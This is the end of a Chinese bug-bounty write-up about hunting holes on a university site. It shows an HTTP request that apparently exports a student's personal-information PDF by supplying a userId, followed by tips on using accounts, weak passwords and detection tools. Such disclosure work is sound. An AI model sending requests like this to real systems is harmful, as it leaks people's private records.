POST /api/personal/Export/saveAndExportFile HTTP/1.1
Host: webvpn.XXXXX.edu.cn
Cookie:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Connection: close
{
"value":{
"name":"",
"exportTableList":[
{
"parentId":"root",
"name":"数字档案",
},
{
"parentId":"21",
"isLeaf":1,
"sjkbm":"XS_JBXX",
"name":"学生基本信息",
}
],
"exportTemplateNum":"",
"type":"2",
"userId":"2021010101",
"fileType":"PDF",
"title":"个人信息"
}
}
结尾
其实可以发现现在外部网站基本上已经很难出现漏洞,如果有账号可以更快速的挖掘漏洞,有时候账号才是制胜关键,弱口令才是 “最严重” 漏洞。
还有在此前挖掘泄露敏感信息的漏洞时常常会依赖 hae 等识别敏感信息的工具。像这次返回包中只返回 true 接着就下载文件,这样的返回包是没办法识别出信息的,所以还是需要细心,把每个功能点都关注到。
原文始发于微信公众号(网安日记本):漏洞挖掘—EDU SRC证书站漏洞挖掘记录(2)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论